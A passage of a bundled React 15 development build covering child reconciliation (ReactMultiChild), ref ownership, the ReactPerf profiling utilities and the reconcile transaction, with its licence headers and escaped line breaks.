maps.\n     * @return {array} An array of mounted representations.\n     * @internal\n     */\n    mountChildren: function (nestedChildren, transaction, context) {\n      var children = this._reconcilerInstantiateChildren(nestedChildren, transaction, context);\n      this._renderedChildren = children;\n\n      var mountImages = [];\n      var index = 0;\n      for (var name in children) {\n        if (children.hasOwnProperty(name)) {\n          var child = children[name];\n          var selfDebugID = 0;\n          if (\"development\" !== 'production') {\n            selfDebugID = getDebugID(this);\n          }\n          var mountImage = ReactReconciler.mountComponent(child, transaction, this, this._hostContainerInfo, context, selfDebugID);\n          child._mountIndex = index++;\n          mountImages.push(mountImage);\n        }\n      }\n\n      if (\"development\" !== 'production') {\n        setChildrenForInstrumentation.call(this, children);\n      }\n\n      return mountImages;\n    },\n\n    /**\n     * Replaces any rendered children with a text content string.\n     *\n     * @param {string} nextContent String of content.\n     * @internal\n     */\n    updateTextContent: function (nextContent) {\n      var prevChildren = this._renderedChildren;\n      // Remove any rendered children.\n      ReactChildReconciler.unmountChildren(prevChildren, false);\n      for (var name in prevChildren) {\n        if (prevChildren.hasOwnProperty(name)) {\n          !false ? \"development\" !== 'production' ? invariant(false, 'updateTextContent called on non-empty component.') : _prodInvariant('118') : void 0;\n        }\n      }\n      // Set new text content.\n      var updates = [makeTextContent(nextContent)];\n      processQueue(this, updates);\n    },\n\n    /**\n     * Replaces any rendered children with a markup string.\n     *\n     * @param {string} nextMarkup String of markup.\n     * @internal\n     */\n    updateMarkup: function (nextMarkup) {\n      var prevChildren = this._renderedChildren;\n      // Remove any rendered children.\n      ReactChildReconciler.unmountChildren(prevChildren, false);\n      for (var name in prevChildren) {\n        if (prevChildren.hasOwnProperty(name)) {\n          !false ? \"development\" !== 'production' ? invariant(false, 'updateTextContent called on non-empty component.') : _prodInvariant('118') : void 0;\n        }\n      }\n      var updates = [makeSetMarkup(nextMarkup)];\n      processQueue(this, updates);\n    },\n\n    /**\n     * Updates the rendered children with new children.\n     *\n     * @param {?object} nextNestedChildrenElements Nested child element maps.\n     * @param {ReactReconcileTransaction} transaction\n     * @internal\n     */\n    updateChildren: function (nextNestedChildrenElements, transaction, context) {\n      // Hook used by React ART\n      this._updateChildren(nextNestedChildrenElements, transaction, context);\n    },\n\n    /**\n     * @param {?object} nextNestedChildrenElements Nested child element maps.\n     * @param {ReactReconcileTransaction} transaction\n     * @final\n     * @protected\n     */\n    _updateChildren: function (nextNestedChildrenElements, transaction, context) {\n      var prevChildren = this._renderedChildren;\n      var removedNodes = {};\n      var mountImages = [];\n      var nextChildren = this._reconcilerUpdateChildren(prevChildren, nextNestedChildrenElements, mountImages, removedNodes, transaction, context);\n      if (!nextChildren && !prevChildren) {\n        return;\n      }\n      var updates = null;\n      var name;\n      // `nextIndex` will increment for each child in `nextChildren`, but\n      // `lastIndex` will be the last index visited in `prevChildren`.\n      var nextIndex = 0;\n      var lastIndex = 0;\n      // `nextMountIndex` will increment for each newly mounted child.\n      var nextMountIndex = 0;\n      var lastPlacedNode = null;\n      for (name in nextChildren) {\n        if (!nextChildren.hasOwnProperty(name)) {\n          continue;\n        }\n        var prevChild = prevChildren && prevChildren[name];\n        var nextChild = nextChildren[name];\n        if (prevChild === nextChild) {\n          updates = enqueue(updates, this.moveChild(prevChild, lastPlacedNode, nextIndex, lastIndex));\n          lastIndex = Math.max(prevChild._mountIndex, lastIndex);\n          prevChild._mountIndex = nextIndex;\n        } else {\n          if (prevChild) {\n            // Update `lastIndex` before `_mountIndex` gets unset by unmounting.\n            lastIndex = Math.max(prevChild._mountIndex, lastIndex);\n            // The `removedNodes` loop below will actually remove the child.\n          }\n          // The child must be instantiated before it's mounted.\n          updates = enqueue(updates, this._mountChildAtIndex(nextChild, mountImages[nextMountIndex], lastPlacedNode, nextIndex, transaction, context));\n          nextMountIndex++;\n        }\n        nextIndex++;\n        lastPlacedNode = ReactReconciler.getHostNode(nextChild);\n      }\n      // Remove children that are no longer present.\n      for (name in removedNodes) {\n        if (removedNodes.hasOwnProperty(name)) {\n          updates = enqueue(updates, this._unmountChild(prevChildren[name], removedNodes[name]));\n        }\n      }\n      if (updates) {\n        processQueue(this, updates);\n      }\n      this._renderedChildren = nextChildren;\n\n      if (\"development\" !== 'production') {\n        setChildrenForInstrumentation.call(this, nextChildren);\n      }\n    },\n\n    /**\n     * Unmounts all rendered children. This should be used to clean up children\n     * when this component is unmounted. It does not actually perform any\n     * backend operations.\n     *\n     * @internal\n     */\n    unmountChildren: function (safely) {\n      var renderedChildren = this._renderedChildren;\n      ReactChildReconciler.unmountChildren(renderedChildren, safely);\n      this._renderedChildren = null;\n    },\n\n    /**\n     * Moves a child component to the supplied index.\n     *\n     * @param {ReactComponent} child Component to move.\n     * @param {number} toIndex Destination index of the element.\n     * @param {number} lastIndex Last index visited of the siblings of `child`.\n     * @protected\n     */\n    moveChild: function (child, afterNode, toIndex, lastIndex) {\n      // If the index of `child` is less than `lastIndex`, then it needs to\n      // be moved. Otherwise, we do not need to move it because a child will be\n      // inserted or moved before `child`.\n      if (child._mountIndex < lastIndex) {\n        return makeMove(child, afterNode, toIndex);\n      }\n    },\n\n    /**\n     * Creates a child component.\n     *\n     * @param {ReactComponent} child Component to create.\n     * @param {string} mountImage Markup to insert.\n     * @protected\n     */\n    createChild: function (child, afterNode, mountImage) {\n      return makeInsertMarkup(mountImage, afterNode, child._mountIndex);\n    },\n\n    /**\n     * Removes a child component.\n     *\n     * @param {ReactComponent} child Child to remove.\n     * @protected\n     */\n    removeChild: function (child, node) {\n      return makeRemove(child, node);\n    },\n\n    /**\n     * Mounts a child with the supplied name.\n     *\n     * NOTE: This is part of `updateChildren` and is here for readability.\n     *\n     * @param {ReactComponent} child Component to mount.\n     * @param {string} name Name of the child.\n     * @param {number} index Index at which to insert the child.\n     * @param {ReactReconcileTransaction} transaction\n     * @private\n     */\n    _mountChildAtIndex: function (child, mountImage, afterNode, index, transaction, context) {\n      child._mountIndex = index;\n      return this.createChild(child, afterNode, mountImage);\n    },\n\n    /**\n     * Unmounts a rendered child.\n     *\n     * NOTE: This is part of `updateChildren` and is here for readability.\n     *\n     * @param {ReactComponent} child Component to unmount.\n     * @private\n     */\n    _unmountChild: function (child, node) {\n      var update = this.removeChild(child, node);\n      child._mountIndex = null;\n      return update;\n    }\n  }\n};\n\nmodule.exports = ReactMultiChild;\n},{\"109\":109,\"126\":126,\"134\":134,\"144\":144,\"152\":152,\"27\":27,\"29\":29,\"63\":63,\"64\":64,\"75\":75}],69:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar React = _dereq_(135);\n\nvar invariant = _dereq_(152);\n\nvar ReactNodeTypes = {\n  HOST: 0,\n  COMPOSITE: 1,\n  EMPTY: 2,\n\n  getType: function (node) {\n    if (node === null || node === false) {\n      return ReactNodeTypes.EMPTY;\n    } else if (React.isValidElement(node)) {\n      if (typeof node.type === 'function') {\n        return ReactNodeTypes.COMPOSITE;\n      } else {\n        return ReactNodeTypes.HOST;\n      }\n    }\n    !false ? \"development\" !== 'production' ? invariant(false, 'Unexpected node: %s', node) : _prodInvariant('26', node) : void 0;\n  }\n};\n\nmodule.exports = ReactNodeTypes;\n},{\"126\":126,\"135\":135,\"152\":152}],70:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _prodInvariant = _dereq_(126);\n\nvar invariant = _dereq_(152);\n\n/**\n * @param {?object} object\n * @return {boolean} True if `object` is a valid owner.\n * @final\n */\nfunction isValidOwner(object) {\n  return !!(object && typeof object.attachRef === 'function' && typeof object.detachRef === 'function');\n}\n\n/**\n * ReactOwners are capable of storing references to owned components.\n *\n * All components are capable of //being// referenced by owner components, but\n * only ReactOwner components are capable of //referencing// owned components.\n * The named reference is known as a \"ref\".\n *\n * Refs are available when mounted and updated during reconciliation.\n *\n *   var MyComponent = React.createClass({\n *     render: function() {\n *       return (\n *         <div onClick={this.handleClick}>\n *           <CustomComponent ref=\"custom\" />\n *         </div>\n *       );\n *     },\n *     handleClick: function() {\n *       this.refs.custom.handleClick();\n *     },\n *     componentDidMount: function() {\n *       this.refs.custom.initialize();\n *     }\n *   });\n *\n * Refs should rarely be used. When refs are used, they should only be done to\n * control data that is not handled by React's data flow.\n *\n * @class ReactOwner\n */\nvar ReactOwner = {\n  /**\n   * Adds a component by ref to an owner component.\n   *\n   * @param {ReactComponent} component Component to reference.\n   * @param {string} ref Name by which to refer to the component.\n   * @param {ReactOwner} owner Component on which to record the ref.\n   * @final\n   * @internal\n   */\n  addComponentAsRefTo: function (component, ref, owner) {\n    !isValidOwner(owner) ? \"development\" !== 'production' ? invariant(false, 'addComponentAsRefTo(...): Only a ReactOwner can have refs. You might be adding a ref to a component that was not created inside a component\\'s `render` method, or you have multiple copies of React loaded (details: https://fb.me/react-refs-must-have-owner).') : _prodInvariant('119') : void 0;\n    owner.attachRef(ref, component);\n  },\n\n  /**\n   * Removes a component by ref from an owner component.\n   *\n   * @param {ReactComponent} component Component to dereference.\n   * @param {string} ref Name of the ref to remove.\n   * @param {ReactOwner} owner Component on which the ref is recorded.\n   * @final\n   * @internal\n   */\n  removeComponentAsRefFrom: function (component, ref, owner) {\n    !isValidOwner(owner) ? \"development\" !== 'production' ? invariant(false, 'removeComponentAsRefFrom(...): Only a ReactOwner can have refs. You might be removing a ref to a component that was not created inside a component\\'s `render` method, or you have multiple copies of React loaded (details: https://fb.me/react-refs-must-have-owner).') : _prodInvariant('120') : void 0;\n    var ownerPublicInstance = owner.getPublicInstance();\n    // Check that `component`'s owner is still alive and that `component` is still the current ref\n    // because we do not want to detach the ref if another component stole it.\n    if (ownerPublicInstance && ownerPublicInstance.refs[ref] === component.getPublicInstance()) {\n      owner.detachRef(ref);\n    }\n  }\n};\n\nmodule.exports = ReactOwner;\n},{\"126\":126,\"152\":152}],71:[function(_dereq_,module,exports){\n/**\n * Copyright 2016-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar _extends = _assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };\n\nvar ReactDebugTool = _dereq_(50);\nvar lowPriorityWarning = _dereq_(124);\nvar alreadyWarned = false;\n\nfunction roundFloat(val) {\n  var base = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : 2;\n\n  var n = Math.pow(10, base);\n  return Math.floor(val * n) / n;\n}\n\n// Flow type definition of console.table is too strict right now, see\n// https://github.com/facebook/flow/pull/2353 for updates\nfunction consoleTable(table) {\n  console.table(table);\n}\n\nfunction warnInProduction() {\n  if (alreadyWarned) {\n    return;\n  }\n  alreadyWarned = true;\n  if (typeof console !== 'undefined') {\n    console.error('ReactPerf is not supported in the production builds of React. ' + 'To collect measurements, please use the development build of React instead.');\n  }\n}\n\nfunction getLastMeasurements() {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return [];\n  }\n\n  return ReactDebugTool.getFlushHistory();\n}\n\nfunction getExclusive() {\n  var flushHistory = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : getLastMeasurements();\n\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return [];\n  }\n\n  var aggregatedStats = {};\n  var affectedIDs = {};\n\n  function updateAggregatedStats(treeSnapshot, instanceID, timerType, applyUpdate) {\n    var displayName = treeSnapshot[instanceID].displayName;\n\n    var key = displayName;\n    var stats = aggregatedStats[key];\n    if (!stats) {\n      affectedIDs[key] = {};\n      stats = aggregatedStats[key] = {\n        key: key,\n        instanceCount: 0,\n        counts: {},\n        durations: {},\n        totalDuration: 0\n      };\n    }\n    if (!stats.durations[timerType]) {\n      stats.durations[timerType] = 0;\n    }\n    if (!stats.counts[timerType]) {\n      stats.counts[timerType] = 0;\n    }\n    affectedIDs[key][instanceID] = true;\n    applyUpdate(stats);\n  }\n\n  flushHistory.forEach(function (flush) {\n    var measurements = flush.measurements,\n        treeSnapshot = flush.treeSnapshot;\n\n    measurements.forEach(function (measurement) {\n      var duration = measurement.duration,\n          instanceID = measurement.instanceID,\n          timerType = measurement.timerType;\n\n      updateAggregatedStats(treeSnapshot, instanceID, timerType, function (stats) {\n        stats.totalDuration += duration;\n        stats.durations[timerType] += duration;\n        stats.counts[timerType]++;\n      });\n    });\n  });\n\n  return Object.keys(aggregatedStats).map(function (key) {\n    return _extends({}, aggregatedStats[key], {\n      instanceCount: Object.keys(affectedIDs[key]).length\n    });\n  }).sort(function (a, b) {\n    return b.totalDuration - a.totalDuration;\n  });\n}\n\nfunction getInclusive() {\n  var flushHistory = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : getLastMeasurements();\n\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return [];\n  }\n\n  var aggregatedStats = {};\n  var affectedIDs = {};\n\n  function updateAggregatedStats(treeSnapshot, instanceID, applyUpdate) {\n    var _treeSnapshot$instanc = treeSnapshot[instanceID],\n        displayName = _treeSnapshot$instanc.displayName,\n        ownerID = _treeSnapshot$instanc.ownerID;\n\n    var owner = treeSnapshot[ownerID];\n    var key = (owner ? owner.displayName + ' > ' : '') + displayName;\n    var stats = aggregatedStats[key];\n    if (!stats) {\n      affectedIDs[key] = {};\n      stats = aggregatedStats[key] = {\n        key: key,\n        instanceCount: 0,\n        inclusiveRenderDuration: 0,\n        renderCount: 0\n      };\n    }\n    affectedIDs[key][instanceID] = true;\n    applyUpdate(stats);\n  }\n\n  var isCompositeByID = {};\n  flushHistory.forEach(function (flush) {\n    var measurements = flush.measurements;\n\n    measurements.forEach(function (measurement) {\n      var instanceID = measurement.instanceID,\n          timerType = measurement.timerType;\n\n      if (timerType !== 'render') {\n        return;\n      }\n      isCompositeByID[instanceID] = true;\n    });\n  });\n\n  flushHistory.forEach(function (flush) {\n    var measurements = flush.measurements,\n        treeSnapshot = flush.treeSnapshot;\n\n    measurements.forEach(function (measurement) {\n      var duration = measurement.duration,\n          instanceID = measurement.instanceID,\n          timerType = measurement.timerType;\n\n      if (timerType !== 'render') {\n        return;\n      }\n      updateAggregatedStats(treeSnapshot, instanceID, function (stats) {\n        stats.renderCount++;\n      });\n      var nextParentID = instanceID;\n      while (nextParentID) {\n        // As we traverse parents, only count inclusive time towards composites.\n        // We know something is a composite if its render() was called.\n        if (isCompositeByID[nextParentID]) {\n          updateAggregatedStats(treeSnapshot, nextParentID, function (stats) {\n            stats.inclusiveRenderDuration += duration;\n          });\n        }\n        nextParentID = treeSnapshot[nextParentID].parentID;\n      }\n    });\n  });\n\n  return Object.keys(aggregatedStats).map(function (key) {\n    return _extends({}, aggregatedStats[key], {\n      instanceCount: Object.keys(affectedIDs[key]).length\n    });\n  }).sort(function (a, b) {\n    return b.inclusiveRenderDuration - a.inclusiveRenderDuration;\n  });\n}\n\nfunction getWasted() {\n  var flushHistory = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : getLastMeasurements();\n\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return [];\n  }\n\n  var aggregatedStats = {};\n  var affectedIDs = {};\n\n  function updateAggregatedStats(treeSnapshot, instanceID, applyUpdate) {\n    var _treeSnapshot$instanc2 = treeSnapshot[instanceID],\n        displayName = _treeSnapshot$instanc2.displayName,\n        ownerID = _treeSnapshot$instanc2.ownerID;\n\n    var owner = treeSnapshot[ownerID];\n    var key = (owner ? owner.displayName + ' > ' : '') + displayName;\n    var stats = aggregatedStats[key];\n    if (!stats) {\n      affectedIDs[key] = {};\n      stats = aggregatedStats[key] = {\n        key: key,\n        instanceCount: 0,\n        inclusiveRenderDuration: 0,\n        renderCount: 0\n      };\n    }\n    affectedIDs[key][instanceID] = true;\n    applyUpdate(stats);\n  }\n\n  flushHistory.forEach(function (flush) {\n    var measurements = flush.measurements,\n        treeSnapshot = flush.treeSnapshot,\n        operations = flush.operations;\n\n    var isDefinitelyNotWastedByID = {};\n\n    // Find host components associated with an operation in this batch.\n    // Mark all components in their parent tree as definitely not wasted.\n    operations.forEach(function (operation) {\n      var instanceID = operation.instanceID;\n\n      var nextParentID = instanceID;\n      while (nextParentID) {\n        isDefinitelyNotWastedByID[nextParentID] = true;\n        nextParentID = treeSnapshot[nextParentID].parentID;\n      }\n    });\n\n    // Find composite components that rendered in this batch.\n    // These are potential candidates for being wasted renders.\n    var renderedCompositeIDs = {};\n    measurements.forEach(function (measurement) {\n      var instanceID = measurement.instanceID,\n          timerType = measurement.timerType;\n\n      if (timerType !== 'render') {\n        return;\n      }\n      renderedCompositeIDs[instanceID] = true;\n    });\n\n    measurements.forEach(function (measurement) {\n      var duration = measurement.duration,\n          instanceID = measurement.instanceID,\n          timerType = measurement.timerType;\n\n      if (timerType !== 'render') {\n        return;\n      }\n\n      // If there was a DOM update below this component, or it has just been\n      // mounted, its render() is not considered wasted.\n      var updateCount = treeSnapshot[instanceID].updateCount;\n\n      if (isDefinitelyNotWastedByID[instanceID] || updateCount === 0) {\n        return;\n      }\n\n      // We consider this render() wasted.\n      updateAggregatedStats(treeSnapshot, instanceID, function (stats) {\n        stats.renderCount++;\n      });\n\n      var nextParentID = instanceID;\n      while (nextParentID) {\n        // Any parents rendered during this batch are considered wasted\n        // unless we previously marked them as dirty.\n        var isWasted = renderedCompositeIDs[nextParentID] && !isDefinitelyNotWastedByID[nextParentID];\n        if (isWasted) {\n          updateAggregatedStats(treeSnapshot, nextParentID, function (stats) {\n            stats.inclusiveRenderDuration += duration;\n          });\n        }\n        nextParentID = treeSnapshot[nextParentID].parentID;\n      }\n    });\n  });\n\n  return Object.keys(aggregatedStats).map(function (key) {\n    return _extends({}, aggregatedStats[key], {\n      instanceCount: Object.keys(affectedIDs[key]).length\n    });\n  }).sort(function (a, b) {\n    return b.inclusiveRenderDuration - a.inclusiveRenderDuration;\n  });\n}\n\nfunction getOperations() {\n  var flushHistory = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : getLastMeasurements();\n\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return [];\n  }\n\n  var stats = [];\n  flushHistory.forEach(function (flush, flushIndex) {\n    var operations = flush.operations,\n        treeSnapshot = flush.treeSnapshot;\n\n    operations.forEach(function (operation) {\n      var instanceID = operation.instanceID,\n          type = operation.type,\n          payload = operation.payload;\n      var _treeSnapshot$instanc3 = treeSnapshot[instanceID],\n          displayName = _treeSnapshot$instanc3.displayName,\n          ownerID = _treeSnapshot$instanc3.ownerID;\n\n      var owner = treeSnapshot[ownerID];\n      var key = (owner ? owner.displayName + ' > ' : '') + displayName;\n\n      stats.push({\n        flushIndex: flushIndex,\n        instanceID: instanceID,\n        key: key,\n        type: type,\n        ownerID: ownerID,\n        payload: payload\n      });\n    });\n  });\n  return stats;\n}\n\nfunction printExclusive(flushHistory) {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return;\n  }\n\n  var stats = getExclusive(flushHistory);\n  var table = stats.map(function (item) {\n    var key = item.key,\n        instanceCount = item.instanceCount,\n        totalDuration = item.totalDuration;\n\n    var renderCount = item.counts.render || 0;\n    var renderDuration = item.durations.render || 0;\n    return {\n      Component: key,\n      'Total time (ms)': roundFloat(totalDuration),\n      'Instance count': instanceCount,\n      'Total render time (ms)': roundFloat(renderDuration),\n      'Average render time (ms)': renderCount ? roundFloat(renderDuration / renderCount) : undefined,\n      'Render count': renderCount,\n      'Total lifecycle time (ms)': roundFloat(totalDuration - renderDuration)\n    };\n  });\n  consoleTable(table);\n}\n\nfunction printInclusive(flushHistory) {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return;\n  }\n\n  var stats = getInclusive(flushHistory);\n  var table = stats.map(function (item) {\n    var key = item.key,\n        instanceCount = item.instanceCount,\n        inclusiveRenderDuration = item.inclusiveRenderDuration,\n        renderCount = item.renderCount;\n\n    return {\n      'Owner > Component': key,\n      'Inclusive render time (ms)': roundFloat(inclusiveRenderDuration),\n      'Instance count': instanceCount,\n      'Render count': renderCount\n    };\n  });\n  consoleTable(table);\n}\n\nfunction printWasted(flushHistory) {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return;\n  }\n\n  var stats = getWasted(flushHistory);\n  var table = stats.map(function (item) {\n    var key = item.key,\n        instanceCount = item.instanceCount,\n        inclusiveRenderDuration = item.inclusiveRenderDuration,\n        renderCount = item.renderCount;\n\n    return {\n      'Owner > Component': key,\n      'Inclusive wasted time (ms)': roundFloat(inclusiveRenderDuration),\n      'Instance count': instanceCount,\n      'Render count': renderCount\n    };\n  });\n  consoleTable(table);\n}\n\nfunction printOperations(flushHistory) {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return;\n  }\n\n  var stats = getOperations(flushHistory);\n  var table = stats.map(function (stat) {\n    return {\n      'Owner > Node': stat.key,\n      Operation: stat.type,\n      Payload: typeof stat.payload === 'object' ? JSON.stringify(stat.payload) : stat.payload,\n      'Flush index': stat.flushIndex,\n      'Owner Component ID': stat.ownerID,\n      'DOM Component ID': stat.instanceID\n    };\n  });\n  consoleTable(table);\n}\n\nvar warnedAboutPrintDOM = false;\nfunction printDOM(measurements) {\n  lowPriorityWarning(warnedAboutPrintDOM, '`ReactPerf.printDOM(...)` is deprecated. Use ' + '`ReactPerf.printOperations(...)` instead.');\n  warnedAboutPrintDOM = true;\n  return printOperations(measurements);\n}\n\nvar warnedAboutGetMeasurementsSummaryMap = false;\nfunction getMeasurementsSummaryMap(measurements) {\n  lowPriorityWarning(warnedAboutGetMeasurementsSummaryMap, '`ReactPerf.getMeasurementsSummaryMap(...)` is deprecated. Use ' + '`ReactPerf.getWasted(...)` instead.');\n  warnedAboutGetMeasurementsSummaryMap = true;\n  return getWasted(measurements);\n}\n\nfunction start() {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return;\n  }\n\n  ReactDebugTool.beginProfiling();\n}\n\nfunction stop() {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return;\n  }\n\n  ReactDebugTool.endProfiling();\n}\n\nfunction isRunning() {\n  if (!(\"development\" !== 'production')) {\n    warnInProduction();\n    return false;\n  }\n\n  return ReactDebugTool.isProfiling();\n}\n\nvar ReactPerfAnalysis = {\n  getLastMeasurements: getLastMeasurements,\n  getExclusive: getExclusive,\n  getInclusive: getInclusive,\n  getWasted: getWasted,\n  getOperations: getOperations,\n  printExclusive: printExclusive,\n  printInclusive: printInclusive,\n  printWasted: printWasted,\n  printOperations: printOperations,\n  start: start,\n  stop: stop,\n  isRunning: isRunning,\n  // Deprecated:\n  printDOM: printDOM,\n  getMeasurementsSummaryMap: getMeasurementsSummaryMap\n};\n\nmodule.exports = ReactPerfAnalysis;\n},{\"124\":124,\"160\":160,\"50\":50}],72:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar ReactPropTypeLocationNames = {};\n\nif (\"development\" !== 'production') {\n  ReactPropTypeLocationNames = {\n    prop: 'prop',\n    context: 'context',\n    childContext: 'child context'\n  };\n}\n\nmodule.exports = ReactPropTypeLocationNames;\n},{}],73:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n * \n */\n\n'use strict';\n\nvar ReactPropTypesSecret = 'SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED';\n\nmodule.exports = ReactPropTypesSecret;\n},{}],74:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar _assign = _dereq_(160);\n\nvar CallbackQueue = _dereq_(6);\nvar PooledClass = _dereq_(25);\nvar ReactBrowserEventEmitter = _dereq_(26);\nvar ReactInputSelection = _dereq_(62);\nvar ReactInstrumentation = _dereq_(64);\nvar Transaction = _dereq_(100);\nvar ReactUpdateQueue = _dereq_(81);\n\n/**\n * Ensures that, when possible, the selection range (currently selected text\n * input) is not disturbed by performing the transaction.\n */\nvar SELECTION_RESTORATION = {\n  /**\n   * @return {Selection} Selection information.\n   */\n  initialize: ReactInputSelection.getSelectionInformation,\n  /**\n   * @param {Selection} sel Selection information returned from `initialize`.\n   */\n  close: ReactInputSelection.restoreSelection\n};\n\n/**\n * Suppresses events (blur/focus) that could be inadvertently dispatched due to\n * high level DOM manipulations (like temporarily removing a text input from the\n * DOM).\n */\nvar EVENT_SUPPRESSION = {\n  /**\n   * @return {boolean} The enabled status of `ReactBrowserEventEmitter` before\n   * the reconciliation.\n   */\n  initialize: function () {\n    var currentlyEnabled = ReactBrowserEventEmitter.isEnabled();\n    ReactBrowserEventEmitter.setEnabled(false);\n    return currentlyEnabled;\n  },\n\n  /**\n   * @param {boolean} previouslyEnabled Enabled status of\n   *   `ReactBrowserEventEmitter` before the reconciliation occurred. `close`\n   *   restores the previous value.\n   */\n  close: function (previouslyEnabled) {\n    ReactBrowserEventEmitter.setEnabled(previouslyEnabled);\n  }\n};\n\n/**\n * Provides a queue for collecting `componentDidMount` and\n * `componentDidUpdate` callbacks during the transaction.\n */\nvar ON_DOM_READY_QUEUEING = {\n  /**\n   * Initializes the internal `onDOMReady` queue.\n   */\n  initialize: function () {\n    this.reactMountReady.reset();\n  },\n\n  /**\n   * After DOM is flushed, invoke all registered `onDOMReady` callbacks.\n   */\n  close: function () {\n    this.reactMountReady.notifyAll();\n  }\n};\n\n/**\n * Executed within the scope of the `Transaction` instance. Consider these as\n * being member methods, but with an implied ordering while being isolated from\n * each other.\n */\nvar TRANSACTION_WRAPPERS = [SELECTION_RESTORATION, EVENT_SUPPRESSION, ON_DOM_READY_QUEUEING];\n\nif (\"development\" !== 'production') {\n  TRANSACTION_WRAPPERS.push({\n    initialize: ReactInstrumentation.debugTool.onBeginFlush,\n    close: ReactInstrumentation.debugTool.onEndFlush\n  });\n}\n\n/**\n * Currently:\n * - The order that these are listed in the transaction is critical:\n * - Suppresses events.\n * - Restores selection range.\n *\n * Future:\n * - Restore document/overflow scroll positions that were unintentionally\n *   modified via DOM insertions above the top viewport boundary.\n * - Implement/integrate with customized constraint based layout system and keep\n *   track of which dimensions must be remeasured.\n *\n * @class ReactReconcileTransaction\n */\nfunction ReactReconcileTransaction(useCreateElement) {\n  this.reinitializeTransaction();\n  // Only server-side rendering really needs this option (see\n  // `ReactServerRendering`), but server-side uses\n  // `ReactServerRenderingTransaction` instead. This option is here so that it's\n  // accessible and defaults to false when `ReactDOMComponent` and\n  // `ReactDOMTextComponent` checks it in `mountComponent`.`\n  this.renderToStaticMarkup = false;\n  this.reactMountReady = CallbackQueue.getPooled(null);\n  this.useCreateElement = useCreateElement;\n}\n\nvar Mixin = {\n  /**\n   * @see Transaction\n   * @abstract\n   * @final\n   * @return {array<object>} List of operation wrap procedures.\n   *   TODO: convert to array<TransactionWrapper>\n   */\n  getTransactionWrappers: function () {\n    return TRANSACTION_WRAPPERS;\n  },\n\n  /**\n   * @return {object} The queue to collect `onDOMReady` callbacks with.\n   */\n  getReactMountReady: function () {\n    return this.reactMountReady;\n  },\n\n  /**\n   * @return {object} The queue to collect React async events.\n   */\n  getUpdateQueue: function () {\n    return ReactUpdateQueue;\n  },\n\n  /**\n   * Save current transaction state -- if the return value from this method is\n   * passed to `rollback`, the transaction will be reset to that state.\n   */\n  checkpoint: function () {\n    // reactMountReady is the our only stateful wrapper\n    return this.reactMountReady.checkpoint();\n  },\n\n  rollback: function (checkpoint) {\n    this.reactMountReady.rollback(checkpoint);\n  },\n\n  /**\n   * `PooledClass` looks for this, and will invoke this before allowing this\n   * instance to be reused.\n   */\n  destructor: function () {\n    CallbackQueue.release(this.reactMountReady);\n    this.reactMountReady = null;\n  }\n};\n\n_assign(ReactReconcileTransaction.prototype, Transaction, Mixin);\n\nPooledClass.addPoolingTo(ReactReconcileTransaction);\n\nmodule.exports = ReactReconcileTransaction;\n},{\"100\":100,\"160\":160,\"25\":25,\"26\":26,\"6\":6,\"62\":62,\"64\":64,\"81\":81}],75:[function(_dereq_,module,exports){\n/**\n * Copyright 2013-present, Facebook, Inc.\n * All rights reserved.\n *\n * This source code is licensed under the BSD-style license found in the\n * LICENSE file in the root directory of this source tree. An additional grant\n * of patent rights can be found in the PATENTS file in the same directory.\n *\n */\n\n'use strict';\n\nvar ReactRef = _dereq_(76);\nvar ReactInstrumentation = _dereq_(64);\n\nvar warning = _dereq_(159);\n\n/**\n * Helper to call ReactRef.attachRefs with this composite component, split out\n * to avoid allocations in the transaction mount-ready queue.\n */\nfunction attachRefs() {\n  ReactRef.attachRefs(this, this._currentElement);\n}\n\nvar ReactReconciler = {\n  /**\n   * Initializes the component, renders markup, and registers event listeners.\n   *\n   * @param {ReactComponent} 